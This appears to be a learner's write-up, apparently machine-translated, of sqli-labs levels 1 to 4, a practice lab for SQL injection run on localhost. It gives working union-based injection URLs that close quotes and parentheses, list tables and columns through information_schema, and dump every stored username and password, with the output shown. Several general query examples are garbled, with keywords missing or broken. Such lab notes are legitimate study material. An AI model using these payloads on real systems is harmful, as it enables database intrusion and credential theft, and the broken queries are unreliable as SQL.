"Sqli-labs" Less1~less4

Learn SQL injection, a bit of my notes when I do sqli-labs. There may be errors, if someone finds out welcome.

Common knowledge points:

There are three types of 1.mysql annotations: ①#: Comments from # to end of line

②--Space: Comment To line end, note--must have a space after

③/**/: Comments/* to */contents

2. Querying the user database name

Select  from Information_schema. SCHEMA 0,1

3. Querying the current database table

Select  from where Table_schema=(selectDATABASE0,1

4. Querying all fields of the specified table

Select  from where table_name='xxx'0,1

5. Joint queries

Select  from Union Select 1,2,3

6. Group_concat multiple rows of results into a single line

Select group_concat (userfromtable01

Use Group_concat to put multiple results into one line. This allows all information to be displayed if there is only one display bit

7. Combine multiple fields into one field concat

Select  from Table

Less-1: Error message, single quote

Base statement: http://127.0.0.1/sqli-labs/Less-1/?id=

1. Test if the ID type is a string, using single quotes ' test

http://127.0.0.1/sqli-labs/less-1/?id= '

Tip: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use near "LIMIT 0,1 ' at line 1

"', stating ID is a string type

2. There are several fields in the test query, with union, the test has 3 paragraphs, and 2, 3 segments will show

http//127.0.0.1/Sqli-Labs/Less-1/? id='Union Select--A
http//127.0.0.1/Sqli-Labs/Less-1/? id=% -%20Union%20Select%201,2,3% ---%20a

3. Querying data in a database

① Querying all table information in a database

http://127.0. 0.1 /sqli-Labs/less-1/? id='  Union Select 1,GROUP_CONCAT (table_name), 3 from INFORMATION_SCHEMA. TABLES WHERE table_schema= (select DATABASE ()) LIMIT 0,1--a

Results: Your Login name:emails,referers,uagents,users

Description There are four sheets

② view all fields in the Users table

http://127.0. 0.1 /sqli-Labs/less-1/? id='  Union Select 1, Group_concat (column_name), 3 from INFORMATION_SCHEMA. COLUMNS WHERE table_name='users'  LIMIT 0,1--a

Results: Your Login Name:id,username,password

③ Querying all user name passwords

http://127.0. 0.1 /sqli-Labs/less-1/? id='  Union Select 1, group_concat (username), Group_concat (password) from users LIMIT 0,1--a

Results:

Your Login Name:dumb,angelina,dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:dumb,i-kill-you,[email Protected],crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo , Admin4

Questions:

Why does the annotation use-a can, use # can not?

Less-2: Error, Integer

① Test ID Type

http://127.0. 0.1 /sqli-Labs/less-2/? id='

Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use near "LIMIT 0,1 ' at line 1

Error only ' LIMIT 0, 1, description ID is numeric, no other quotes wrapped

② queries all usernames and passwords and joins order by to ensure that all content is displayed. The middle step is the same as the first question, skipping.

http//127.0.0.1/Sqli-Labs/Less-2/? id=3 Union Select 1, Group_concat (username), Group_concat (password) fromUsersORDER  byID LIMIT0,1 --a

Less-3: Error, interfering string

① Test ID Type

http://127.0. 0.1 /sqli-Labs/less-3/? id='

Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use-near ' ") LIMIT 0,1 ' at line 1

The difference with the first question is that the ID is followed by a parenthesis, and it can be inferred that the ID is in the format of id = (' 3 '). So when you construct SQL, you have to pay attention to closing the parentheses in addition to closing the quotes.

② querying all user names and passwords

http://127.0. 0.1 /sqli-Labs/less-3/? id=3' ) Union Select 1, Group_concat (username), Group_concat (password) from the users ORDER by ID LIMIT 0,1--a

Less-4: Error, double quote

① Test ID Type

http://127.0. 0.1 /sqli-Labs/less-4/? id='

Results normal output, continue to test, here lazy, according to the name of the direct test double quotation marks

http://127.0. 0.1 /sqli-Labs/less-4/? id= "

Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use-near ' "") LIMIT 0,1 ' on line 1

The description ID is a string and is written as ID = ("3")

② get all user name passwords, close double quotes and parentheses

http//127.0.0.1/Sqli-Labs/Less-4/? id=3")Union Select 1, Group_concat (username), Group_concat (password) fromUsersORDER  byID LIMIT0,1 --a

"Sqli-labs" Less1~less4